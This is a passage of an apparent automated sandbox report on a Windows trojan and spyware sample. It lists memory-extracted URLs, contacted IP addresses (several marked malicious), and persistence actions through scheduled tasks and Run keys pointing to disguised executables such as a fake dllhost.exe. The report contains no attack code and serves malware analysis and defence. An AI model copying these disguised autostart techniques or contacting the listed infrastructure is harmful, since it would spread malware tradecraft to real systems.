https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	8EC4.exe, 00000028.00000002.1005269358.0000000002CD8000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1002161334.0000000002CC2000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.976992957.0000000002C00000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1	8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	false		high
http://tempuri.org/Entity/Id24Response	8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested	8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego	8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing	8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	false		high
https://support.google.com/chrome/?p=plugin_shockwave	8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue	8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse	8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	false		high
http://tempuri.org/Entity/Id5Response	8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultD	8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns	8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	false		high
http://tempuri.org/Entity/Id10Response	8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/Renew	8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	false		high
http://tempuri.org/Entity/Id8Response	8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://support.google.com/chrome/?p=plugin_wmp	8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmp	false		high
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID	8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT	8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2006/02/addressingidentity	8EC4.exe, 00000028.00000002.960931410.0000000002AF0000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey	8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback	8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	false		high
https://support.google.com/chrome/?p=plugin_java	8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT	8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/06/addressingex	8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce	8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse	8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	false		high
http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510	8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	false		high
https://support.google.com/chrome/?p=plugin_divx	8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmp	false		high
http://tempuri.org/Entity/Id13Response	8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd	8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	false		high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif	8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed	8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1	8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	false		high
http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1	8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty	8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct	8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement	8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT	8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1005269358.0000000002CD8000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1002161334.0000000002CC2000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.976992957.0000000002C00000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous	8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap	8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2002/12/policy	8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	false		high
http://tempuri.org/Entity/Id22Response	8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1005269358.0000000002CD8000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1002161334.0000000002CC2000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.976992957.0000000002C00000.00000004.00000001.sdmp	false		high
https://www.tiktok.com/legal/report/feedback	svchost.exe, 0000001D.00000003.800561405.00000188AC37D000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.800577498.00000188AC38E000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.800720160.00000188AC3AF000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue	8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext	8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/Issue	8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	false		high
https://get.adob	8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/spnego	8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/sc	8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	false		high
http://tempuri.org/Entity/Id18Response	8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://service.real.com/realplayer/security/02062012_player/en/	8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmp	false		high
http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd	8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	false		high
https://disneyplus.com/legal.	svchost.exe, 0000001D.00000003.794726448.00000188AC382000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.794353664.00000188AC371000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.794332789.00000188AC360000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.795192720.00000188AC360000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.795091676.00000188AC3A3000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id3Response	8EC4.exe, 00000028.00000002.1019624757.0000000002D58000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/rm	8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence	8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/soap/actor/next	8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	false		high
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1005269358.0000000002CD8000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1002161334.0000000002CC2000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.976992957.0000000002C00000.00000004.00000001.sdmp	false		high
http://service.r	8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary	8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
185.163.45.70	unknown	Moldova Republic of	39798	MIVOCLOUDMD	false
185.215.113.35	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
188.166.28.199	unknown	Netherlands	14061	DIGITALOCEAN-ASNUS	true
86.107.197.138	unknown	Romania	39855	MOD-EUNL	false
54.38.220.85	unicupload.top	France	16276	OVHFR	false
40.93.212.0	microsoft-com.mail.protection.outlook.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
104.21.38.221	goo.su	United States	13335	CLOUDFLARENETUS	false
93.189.42.167	host-data-coin-11.com	Russian Federation	41853	NTCOM-ASRU	false
144.76.136.153	transfer.sh	Germany	24940	HETZNER-ASDE	false
162.159.130.233	cdn.discordapp.com	United States	13335	CLOUDFLARENETUS	false
185.233.81.115	unknown	Russian Federation	50113	SUPERSERVERSDATACENTERRU	true
8.209.67.104	patmushta.info	Singapore	45102	CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	false
185.7.214.171	unknown	France	42652	DELUNETDE	true
185.186.142.166	unknown	Russian Federation	204490	ASKONTELRU	true
141.8.194.74	a0621298.xsph.ru	Russian Federation	35278	SPRINTHOSTRU	false
185.163.204.22	unknown	Germany	20771	CAUCASUS-CABLE-SYSTEMCCSAutonomousSystemGE	false
185.163.204.24	unknown	Germany	20771	CAUCASUS-CABLE-SYSTEMCCSAutonomousSystemGE	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	552969
Start date:	14.01.2022
Start time:	00:13:36
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 16m 13s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	U3E7zMaux2.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	50
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.mine.winEXE@60/50@96/18
EGA Information:	Successful, ratio: 92.3%
HDC Information:	Successful, ratio: 47.6% (good quality ratio 37.6%) Quality average: 64% Quality standard deviation: 39%
HCA Information:	Successful, ratio: 95% Number of executed functions: 185 Number of non-executed functions: 254
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information. Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, UpdateNotificationMgr.exe, backgroundTaskHost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 51.11.168.232, 23.203.70.208, 13.89.179.12, 40.91.112.76, 20.54.110.249, 104.215.148.63, 40.76.4.15, 40.112.72.205, 40.113.200.201, 13.77.161.179, 20.189.173.22 Excluded domains from analysis (whitelisted): bitbucket.org, bbuseruploads.s3.amazonaws.com, displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, onedsblobprdwus17.westus.cloudapp.azure.com, onedsblobprdcus17.centralus.cloudapp.azure.com, wus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, arc.msn.com, e11290.dspg.akamaiedge.net, go.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, yandex.ru, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, iplogger.org, settings-win.data.microsoft.com, settingsfd-geo.trafficmanager.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, go.microsoft.com.edgekey.net, blobcollector.events.data.trafficmanager.net, microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net Execution Graph export aborted for target 8EC4.exe, PID 6240 because there are no executed function Not all processes where analyzed, report is missing behavior information Report creation exceeded maximum time and may have missing behavior and disassembly information. Report creation exceeded maximum time and may have missing disassembly code information. Report size exceeded maximum capacity and may have missing behavior information. Report size exceeded maximum capacity and may have missing disassembly code. Report size exceeded maximum capacity and may have missing network information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtEnumerateKey calls found. Report size getting too big, too many NtOpenFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
00:15:09	Task Scheduler	Run new task: Firefox Default Browser Agent 8F76897F18632802 path: C:\Users\user\AppData\Roaming\uufaeea
00:15:24	API Interceptor	1x Sleep call for process: 7CA1.exe modified
00:15:32	API Interceptor	1x Sleep call for process: WerFault.exe modified
00:15:33	API Interceptor	8x Sleep call for process: svchost.exe modified
00:16:06	API Interceptor	4x Sleep call for process: 7801.exe modified
00:16:06	API Interceptor	414x Sleep call for process: mjlooy.exe modified
00:16:08	Task Scheduler	Run new task: mjlooy.exe path: C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe
00:16:22	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Steam C:\Users\user\AppData\Roaming\NVIDIA\dllhost.exe
00:16:34	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Driver C:\Users\user\AppData\Roaming\Sysfiles\setup_e1.exe
00:16:45	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Steam C:\Users\user\AppData\Roaming\NVIDIA\dllhost.exe
00:16:57	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Driver C:\Users\user\AppData\Roaming\Sysfiles\setup_e1.exe
00:17:09	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start ChromeUpdate.lnk

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_D984.exe_bcd76db1fe5d7f46e1bf3aadcd0e64871c556_e6d2f5c0_1ad174c5\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8140048802892536
Encrypted:	false
SSDEEP:	96:z+FmDLAM1kOQoJ7R3V6tpXIQcQec6tycEfcw3m+HbHg/8BRTf3o8Fa9iVfOyWYmq:as3AMR8HQ0lbjIq/u7s9S274Itr
MD5:	A77187FFD082A4C6C4803FF0494824A7
SHA1:	35CF158AFC534025FE186F1FFAA6DC320623566D
SHA-256:	85DFD5A39411BA976F6A87B3D2915C9EECB867A37B34E4D13A0A267F8A1C74B8
SHA-512:	77B9FA28B7AF746B8DE7192F75C5EB76FBD493A3110CE4678A44CA748396B0C0552260B91BE7B3818C27F79EC56E5959CCC227BC0CC9525A73F7F5D6A7CE14EA
Malicious:	false
Reputation:	unknown
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.6.5.8.9.3.2.2.5.3.4.1.1.6.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.6.5.8.9.3.3.0.8.4.6.5.5.4.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.5.c.3.d.4.c.3.-.0.9.a.9.-.4.2.f.9.-.b.a.2.6.-.4.d.c.2.2.4.9.e.8.0.2.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.b.7.c.e.d.c.6.-.6.9.2.2.-.4.1.7.8.-.9.0.4.5.-.0.7.4.3.c.a.4.6.9.8.b.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.D.9.8.4...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.7.c.-.0.0.0.1.-.0.0.1.b.-.a.d.e.6.-.a.a.6.a.d.3.0.8.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.b.f.3.7.4.4.3.4.4.9.b.5.e.c.b.5.4.f.6.4.0.f.a.2.5.6.e.b.5.8.5.0.0.0.0.2.9.0.1.!.0.0.0.0.5.9.9.5.a.e.9.d.0.2.4.7.0.3.6.c.c.6.d.3.e.a.7.4.1.e.7.5.0.4.c.9.1.3.f.1.f.b.7.6.!.D.9.8.4...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.1.1././.1.2.:.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1E45.tmp.csv Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	59464
Entropy (8bit):	3.0415890459619677
Encrypted:	false
SSDEEP:	1536:rHHZvP5xQZDcKdcZRqoPikqjL/15hokyLNh2DqwixlV:rHHZvP5xQZDcKdcZRqoPikqjL/15hZyT
MD5:	BBF079652672E4A164C9D1F6600E9E1B
SHA1:	CB38376B0999BD10686C79A7341B27D7F6BBDAE7
SHA-256:	D506F771465D8185C355E35DFF9D7A75D004D0558E6BBC175E0AAED4E8281EBA
SHA-512:	060E0BA93F1113209B6CF858D67D965B0016D3521E2BC27EBDF7E1DECCC653512C37E3DCEDBC87A9052FED1106FD38102BD338D5FE1BF6FA0C4F36310AE9209D
Malicious:	false
Reputation:	unknown
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER29CF.tmp.txt Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.6982673798413264
Encrypted:	false
SSDEEP:	96:9GiZYWzRIskYeYAWjqhHX+YEZCLtbimPZrZwhe22zaHjLcO3mIWy3:9jZD45yqnueTaHjLcO3hWy3
MD5:	1E3428F52B7045A77CFD7B0166F40F77
SHA1:	25F5A37E4DBE6DDCB22043B7284BAFCDA1645610
SHA-256:	B011C6766F78C6D95F95404ED5D3BF04BF9875F733ACE46F7641FDE96D27EFF6
SHA-512:	F2C9711D92BAD9C0EFA1B085C08913886B3E39BEAAF2ADE00ABAF4E0092BBDBECD4063EB5E91B89216E802565ED222E93840476860AF62B4CAAAA8C35A4EE43D
Malicious:	false
Reputation:	unknown
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5EAC.tmp.csv Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	54386
Entropy (8bit):	3.0523324327765002
Encrypted:	false
SSDEEP:	1536:/1HBybnA6sgK/x2PRj2nzhmRd1TuOc+3MSi:/1HBybnA6sgK/x2PRj2nzhmRd1TuD+3Y
MD5:	9E2A4C710BF0EF1AB96E0FBC83A94F97
SHA1:	451F103D667B3BC780C511CCC5A517F2E941BDD1
SHA-256:	25A919E83C233B48D3BE7CAFE118537F38C5F1E51868109C002E9ABD7F0DF830
SHA-512:	CAD7424179BF5EA01535947342D5517A6F9A4F5D1BA52E5D61F199145B1D5FF844A0885932C9D91C95DBCBC3C27772D359D15F518BFEA9E5E6774B049E20EC77
Malicious:	false
Reputation:	unknown
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d